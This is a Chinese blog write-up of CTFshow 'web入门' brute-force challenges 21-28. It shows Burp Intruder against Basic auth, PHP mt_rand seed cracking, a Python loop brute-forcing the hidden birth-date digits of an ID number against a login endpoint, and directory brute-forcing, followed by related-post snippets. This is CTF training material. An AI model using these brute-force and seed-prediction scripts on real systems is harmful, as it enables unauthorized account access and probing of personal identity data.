[CTFshow] web入门 爆破21-28

已于 2024-09-13 11:45:29 修改
阅读量827 收藏 20
点赞数 27
分类专栏: CTF 文章标签: 网络安全 web安全 安全
于 2024-09-09 13:12:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46099552/article/details/142056161
版权

CTFshow web入门 爆破21-28

web21

  1. 进去就要输账号密码,随便输入账号密码(admin-123)抓包

  2. 使用的是 HTTP Basic 身份验证,*YWRtaW46MTIz* 解码为admin:123

    GET / HTTP/1.1
Host: 9f50e003-bdc6-4119-a157-ae5076b896e1.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
***Authorization: Basic YWRtaW46MTIz***
Te: trailers
Connection: keep-alive

  3. 使用burp来爆破

    在需要被爆破的地方加上payload位置

    在这里插入图片描述

    添加前缀admin: 以及base64编码

    在这里插入图片描述

    开始爆破

  4. 爆破成功

    在这里插入图片描述

web23

error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}
?>

  1. 复制到本地调试,大概就是经过md5后的值,要进入到最里面

  2. 修改一下代码,用于生成结果,1-10000md5

    for($i = 0; $i < 10000; $i++){
    $token = md5($i);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo "the number is :".$i;
            echo ";the md5 is: ".$token;
            break;
        }
    }
// the number is :422;the md5 is: f85454e8279be180185cac7d243c5eb3

  3. token输入422得到flag

web24

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(372619038);
    if(intval($r)===intval(mt_rand())){
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}

  1. mt_srand(372619038); 是种子值 后续mt_rand()生成的值都是一定的

    本地调试

    mt_srand(372619038);  // 设置随机数生成器种子

echo mt_rand();  // 生成并输出一个随机数
echo "   ";
echo mt_rand();  // 生成并输出另一个随机数
echo "   ";
echo mt_rand();  // 生成并输出另一个随机数
echo "   ";
echo mt_rand();  // 生成并输出另一个随机数
// 1155388967   125197722   1461103528   623173601

    也就是说r的第一个值是1155388967

  2. r 输入1155388967 获得flag

web25

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}

  1. 代码审计,$rand = intval($r)-intval(mt_rand());<=0 即可得到$_COOKIE['token'] ,所以我们输入r = 0 得到第一个0-intval(mt_rand())-1271613066intval(mt_rand()) = 1271613066

  2. 爆破出mt_srand ,使用**php_mt_seed** (ps:写了破解代码效率极低)

    在这里插入图片描述

    seed = 3592631133

  3. 检查是否正确

    mt_srand(3592631133);
echo mt_rand()."   ";
echo mt_rand();
// 1271613066   393064451 (正确)

  4. 代码上r要等于第一次mt_rand,token需要等于 第二和第三次的和,构建数据包

    在这里插入图片描述

web26

  1. 这个可以爆

  2. 输入基本信息,抓包,爆破密码

    在这里插入图片描述

  3. 爆破成功即获得flag

web27

  1. 扫描,发现有录取查询系统,下载录取文件list.xlsx

  2. 发现身份证中间有八位被*号了,发现是出生年日,即要爆破出生年日

  3. 编写脚本

    # -*- coding: utf-8 -*-
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = 'https://bbc06d78-44ff-4ced-8983-ad98d3956ebb.challenge.ctf.show/info/checkdb.php'
class Getoutofloop(Exception):
    pass
try:
    name = "祁落兴" # 姓名
    for y in range(1990, 2025):
        for m in range(1, 13):
            for d in range(1, 32):
                id_num = f'410927{y}{str(m).zfill(2)}{str(d).zfill(2)}5570' # 身份证,需要复制明文的
                data = {
                    "a": f"{name}",
                    "p": f"{id_num}"
                }
                res = requests.post(url, data=data, verify=False)
                if 'success' in res.text:
                    print(f"Name is :{name},ID is :{id_num}")
                    print(res.text.encode('utf-8').decode('unicode_escape'))
                    raise Getoutofloop()
except Getoutofloop:
    pass
//
Name is :祁落兴,ID is :410927199112015570
{"0":"success","msg":"恭喜您,您已被我校录取,你的学号为12015570 初始密码为身份证号码"}

  4. 第一个学生登陆进去获得flag

web28

  1. 大海捞针

  2. utl为:http://385b4a8b-173b-49f1-8153-49aa5534e92e.challenge.ctf.show/0/1/2.txt ,说明 /0/1都是需要爆破的目录

  3. 使用burp抓包,发送到intruder模块

    删掉2.txt ,在目录上添加两个payload模块

    在这里插入图片描述

    设置payload,payload集1和2都一样的

    在这里插入图片描述

  4. 爆破到200状态码及获得flag

Sunset-_
关注
专栏目录
ctfshow web红包题第二弹题解
2302_76724233的博客
09-05 915
我们可以发送一个上传文件的post包,此时php会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpxxxxxx,文件名最后6个字符是随机的大小写字母。但是值得一提的是,通常这些临时文件夹下的文件最后是会被删除的,所以我们不得不想办法在被删除之前执行我们上传的文件。但既然是php的命令执行漏洞,这俩应该是
ctfshow web入门 爆破 21-28
m0_64815693的博客
04-05 1338
ctfshow web入门 爆破 21-28
CTFSHOW web入门 爆破 21-28
Leviathan_Raiden
12-11 2786
CTFSHOW 爆破 [21-28] Web21 可以看到 SELECTED TEXT -> DECODED FROM 用Base64解码 账号密码的格式是 [username]:[password] 所以我们可以用 intruder模块里面的自定义payload position 1: admin position 2: ( : ) 是冒号,不需要用括号哈(方便看清楚) position 3: 可以用题目的字典(其实字典才是最重要) payload processing 使用Base
ctfshow web入门爆破web21-28wp
kinakouni的博客
02-21 512
入门几个月的萌新CTFer,记录下自己做题的wp。
ctfshow web入门21-28爆破
2202_75317918的博客
09-23 544
ctfshow web入门21-28爆破
CTFshow—web入门21-28爆破
一个普普通通的博客
10-15 3596
文章目录WEB21WEB22WEB23WEB24WEB25WEB26WEB27WEB28 WEB21 先随意使用一个密码抓包尝试一下 base64解密后发现账号密码的形式为 账号:密码 根据提示我们使用题目所给字典爆破 构造payload,猜测账户名为admin,前半部分不用变,为后半部分迭代即可 导入所给字典 进行base64编码,切记不可为符号再编码,base64可能存在= attack 拿到flag 或者采用方式二 同样拿下 WEB22 子域名爆破,但是这题爆不出来,直接查看view
ctfshow-web入门-爆破web26-web28
Welcome To Myon'Blog !
06-05 1238
提取:\u606d\u559c\u60a8\uff0c\u60a8\u5df2\u88ab\u6211\u6821\u5f55\u53d6\uff0c\u4f60\u7684\u5b66\u53f7\u4e3a02015237 \u521d\u59cb\u5bc6\u7801\u4e3a\u8eab\u4efd\u8bc1\u53f7\u7801。可以注意到,这里的爆破位置恰好是身份证号的出生年月日的地方,年的话我们就从 1990 开始到 2024,月的话就是 00 到 12,日的话就是 01 到 31。
CTFshow-Web入门-Web21-28爆破完结篇)
m0_61155226的博客
03-21 517
CTFshow-Web入门21-28
ctfshow-web入门-爆破web21-web24)
Welcome To Myon'Blog !
06-02 935
(intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1) === intval(substr($token, 31,1)) 将第 2、15 和 18 个字符转换为整数相加,再除以第 2 个字符的整数值,检查结果是否等于第 32 个字符的整数值;flag.ctf.show 页面无法访问(前面有一个查这个域名的 DNS 的 TXT信息的题也是有问题)
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1094
ctfshow-web入门-爆破wp
ctfshow-web入门-爆破web26,27,28
HkD01L的博客
06-20 1073
ctfshow web26 web27 web28
ctfshow-web入门-爆破web21-24)
HkD01L的博客
06-19 464
ctfshow,爆破,web21,web22,web23,web24,writeup,ctf
CTFShow Web入门_爆破
qq_19533763的博客
04-01 1159
Web21 随便输入抓包 发现Base64加密 账号和密码用:隔开 使用BP构造payload爆破 下载官方提供的字典 把后缀名改为.zip即可打开 使用Custom iterator模式 第一部分 第二部分 第三部分使用字典 添加base64加密 关闭url编码 爆破完按length排序查看最小的回包 Web22 子域名爆破爆破ctf.show 最终在vip.ctf.show的源码发现了flag Web23 error_reporting(0); include('fla
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8456
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】利用域名混淆绕过 CSRF 实现账户接管
等风来
09-08 365
传统的 CSRF 攻击依赖于表单提交,其中包含 application/x-www-form-urlencoded 或 multipart/form-data 类型的数据。这些表单数据可以直接由浏览器发送,而攻击者可以伪造表单提交。然而,application/json 类型的数据必须通过 JavaScript 的 fetch 或 XMLHttpRequest 发送,这要求攻击者的页面能够执行这段 JavaScript,并且满足 CORS(跨源资源共享)策略。
2024网络安全人才实战能力白皮书安全测试评估篇
最新发布
2301_76786857的博客
09-13 538
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全和社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
网络安全】漏洞挖掘之CVE-2019-9670+检测工具
等风来
09-09 238
CVE-2019-9670 是一个与相关的严重漏洞。ZCS 中的 AutoDiscover 服务存在不正确的 XML 解析处理,该漏洞可被利用来注入恶意 XML 代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行 (RCE)。Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
网络安全(黑客)——自学2024
2401_84466325的博客
09-13 932
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
ctfshow web入门 爆破
08-24
爆破是一种常见的攻击技术,用于尝试猜测用户名、密码或其他敏感信息。在Web入门的CTF比赛中,爆破通常用于暴力破解登录页面或者访问受保护的资源。 要进行Web爆破,你需要使用一个工具或编写自己的脚本来自动化这个过程。一种常见的工具是Burp Suite,它提供了强大的代理和爆破功能。以下是一个基本的爆破示例: 1. 确定目标:找到需要爆破的登录页面或需要访问的受保护资源。 2. 准备字典:创建一个包含可能的用户名和密码组合的字典文件。 3. 配置代理:将Burp Suite设置为拦截请求和响应。 4. 配置爆破设置:在Burp Suite中配置爆破设置,包括目标URL和字典文件路径。 5. 启动爆破:运行Burp Suite的爆破模块,它将自动尝试使用字典中的用户名和密码进行登录或访问。 6. 分析结果:查看Burp Suite的输出,检查是否找到了正确的用户名和密码组合。 请注意,在实际渗透测试或CTF比赛中,爆破可能是非常耗时的,并且可能违反法律或伦理规定。在进行爆破之前,你应该确保你有合法授权来测试目标系统,并遵守相关的法律和规定。 希望这个简单的爆破示例能帮到你!如果你有更多问题,可以继续问我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值